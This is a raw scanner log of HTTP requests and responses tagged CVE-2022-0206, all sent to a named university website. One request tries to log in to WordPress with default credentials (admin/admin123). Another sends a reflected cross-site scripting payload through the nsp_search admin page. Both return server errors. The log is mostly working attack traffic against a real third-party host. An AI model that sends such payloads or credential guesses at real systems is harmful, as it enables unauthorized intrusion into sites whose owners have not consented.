[CVE-2022-0206] Dumped HTTP request for https://www.tbwl.esrc.unimelb.edu.au/wp-login.php


POST /wp-login.php HTTP/1.1
Host: www.tbwl.esrc.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Content-Length: 39
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

log=admin&pwd=admin123&wp-submit=Log+In
[CVE-2022-0206] Dumped HTTP response https://www.tbwl.esrc.unimelb.edu.au/wp-login.php

HTTP/1.1 405 Method Not Allowed
Connection: close
Content-Length: 422
Allow: GET, HEAD, OPTIONS
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:19:01 GMT
Server: AmazonS3
Via: 1.1 3055c6bccfd52f4c0ae40793124cb388.cloudfront.net (CloudFront)
X-Amz-Cf-Id: DkOi_6QkoR2-R48iSgR_TtI7PGyuUD3AKQoJ8J-JNK0wgjBQ8oc8hA==
X-Amz-Cf-Pop: IAD55-P6
X-Cache: Error from cloudfront

<html>
<head><title>405 Method Not Allowed</title></head>
<body>
<h1>405 Method Not Allowed</h1>
<ul>
<li>Code: MethodNotAllowed</li>
<li>Message: The specified method is not allowed against this resource.</li>
<li>Method: POST</li>
<li>ResourceType: OBJECT</li>
<li>RequestId: X4B57R51GVR0A4Z2</li>
<li>HostId: oyGIizUuq0vRll2/qkX3mQnpwb6nOLqW+IuqXqSSMjRup9VUB7CEyVZHkL2AGXgnxigACSA/Sio=</li>
</ul>
<hr/>
</body>
</html>

[CVE-2022-0206] Dumped HTTP request for https://www.tbwl.esrc.unimelb.edu.au/wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x


GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1
Host: www.tbwl.esrc.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


[CVE-2022-0206] Dumped HTTP response https://www.tbwl.esrc.unimelb.edu.au/wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 536
Age: 2
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:18:59 GMT
Server: AmazonS3
Via: 1.1 62606fa7092a905727637e669f8f39e2.cloudfront.net (CloudFront)
X-Amz-Cf-Id: q17SG6D5MiXxYGoo7aSCQhm5e4nLqYyGCl_kLSEdy5XoEICsD-BOdA==
X-Amz-Cf-Pop: IAD55-P6
X-Cache: Error from cloudfront

<html>
<head><title>404 Not Found</title></head>
<body>
<h1>404 Not Found</h1>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: 404.html</li>
<li>RequestId: 2MP3SAEWT8QB0KK7</li>
<li>HostId: YxdRLMd/aAVzUvW3shK65D57rdzxEKPJyx3UiJWW9mc17qEQteQvpJ6wrPjHiydr3UhSQnSn7/Q=</li>
</ul>
<h3>An Error Occurred While Attempting to Retrieve a Custom Error Document</h3>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: error.html</li>
</ul>
<hr/>
</body>
</html>

